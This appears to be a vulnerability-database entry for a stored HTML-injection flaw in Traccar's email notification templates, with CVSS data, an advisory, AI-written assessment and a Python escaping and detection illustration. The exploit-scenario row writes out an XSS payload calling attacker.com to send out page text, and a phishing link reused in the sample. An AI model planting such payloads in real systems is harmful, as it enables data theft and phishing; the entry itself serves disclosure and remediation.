Severity by source
AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Primary rating from GitHub Advisory · only source for this CVE.
CVSS Vector (GitHub Advisory)
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Description (GitHub Advisory)
Traccar is an open source GPS tracking system. In org.traccar:traccar versions starting at 6.11.1 before 6.13.0, the email notification templates insert user-controlled device, geofence, and driver names into HTML email output without proper escaping. An attacker with low privileges can store crafted HTML in these fields, which is then rendered in notification emails sent to other users with access to the affected devices. This can lead to phishing or spoofed email content. This issue is fixed in version 6.13.0.
Analysis (AI)
Stored cross-site scripting (XSS) in Traccar 6.11.1 through 6.12.x allows low-privilege authenticated users to inject malicious HTML into device, geofence, and driver name fields, which is then rendered unescaped in email notification templates sent to other users. This enables phishing attacks or spoofed email content delivered via the application's notification system. …
Attack Chain (AI-derived): hypothetical attack flow derived from CVE metadata.
Vulnerability Assessment (AI)
| Aspect | Assessment |
|---|---|
| Exploitation | Exploitation requires: (1) a valid Traccar user account with low-privilege permissions sufficient to create or modify device, geofence, or driver name fields; (2) access to the Traccar web interface or API endpoints that update these object properties; (3) at least one other user with permission to view notifications for the modified objects (typically higher-privilege administrators or team members); and (4) a notification trigger event (geofence entry/exit, alert condition, etc.) that causes an email to be sent to the target user. … |
| Risk Assessment | CVSS 5.4 (Medium) reflects the moderate severity: network-accessible (AV:N), low attack complexity (AC:L), requires low privileges (PR:L), and requires user interaction (UI:R; the recipient must open the HTML email). … |
| Exploit Scenario | A low-privilege user with access to create or edit devices in a Traccar fleet management system injects an HTML payload into a device name field, such as '<img src=x onerror="fetch('http://attacker.com?admin_email='+document.body.innerText)">', or a phishing-like payload such as '<a href="http://phishing.com">Click here to re-authenticate</a>'. When the device triggers a geofence exit or entry notification, Traccar generates an email to fleet administrators containing this unescaped HTML. … |
| Remediation | Upgrade Traccar to version 6.13.0 or later immediately, as this version includes fixes for HTML escaping in email notification templates. … |
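As an added illustration (not Traccar's own code or templates), the following shows the unescaped-versus-escaped rendering the advisory describes, together with a check for tags that did not come from the template and an audit check for stored names that contain markup. The template, field names and sample record are constructed stand-ins; the sample device name reuses the phishing link from the scenario above.

```python
import html
import re
from string import Template

# Constructed stand-in for an HTML notification template (an assumption; this is
# not Traccar's own template). The field names are the ones the advisory lists.
TEMPLATE = Template(
    "<p>Device <b>$device</b> exited geofence <b>$geofence</b> "
    "(driver: $driver).</p>"
)
USER_CONTROLLED = {"device", "geofence", "driver"}


def render_unescaped(fields):
    """The pre-6.13.0 behaviour the advisory describes: raw values go into the HTML."""
    return TEMPLATE.substitute(fields)


def render_escaped(fields):
    """The fix: HTML-escape every user-controlled field before substitution."""
    safe = {k: html.escape(v, quote=True) if k in USER_CONTROLLED else v
            for k, v in fields.items()}
    return TEMPLATE.substitute(safe)


TAG_RE = re.compile(r"<[^>]*>")
TEMPLATE_TAGS = set(TAG_RE.findall(TEMPLATE.template))  # <p>, <b>, </b>, </p>


def injected_tags(rendered):
    """Tags present in the rendered email that the template itself did not contain."""
    return [t for t in TAG_RE.findall(rendered) if t not in TEMPLATE_TAGS]


def names_with_markup(fields):
    """Audit check for stored records: user-controlled names containing angle brackets."""
    return sorted(k for k, v in fields.items()
                  if k in USER_CONTROLLED and ("<" in v or ">" in v))


# Constructed sample record; the device name carries the phishing link from the scenario above.
SAMPLE = {
    "device": 'Truck 7 <a href="http://phishing.com">Click here to re-authenticate</a>',
    "geofence": "Depot North",
    "driver": "A. Smith & Sons",
}

if __name__ == "__main__":
    print(injected_tags(render_unescaped(SAMPLE)))  # ['<a href="http://phishing.com">', '</a>']
    print(injected_tags(render_escaped(SAMPLE)))    # []
    print(names_with_markup(SAMPLE))                # ['device']
```

The escaped rendering keeps the ampersand in a legitimate name readable (`&amp;`) while turning the injected anchor into inert text, which is the property to verify after upgrading or patching templates.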
EUVD-2026-27309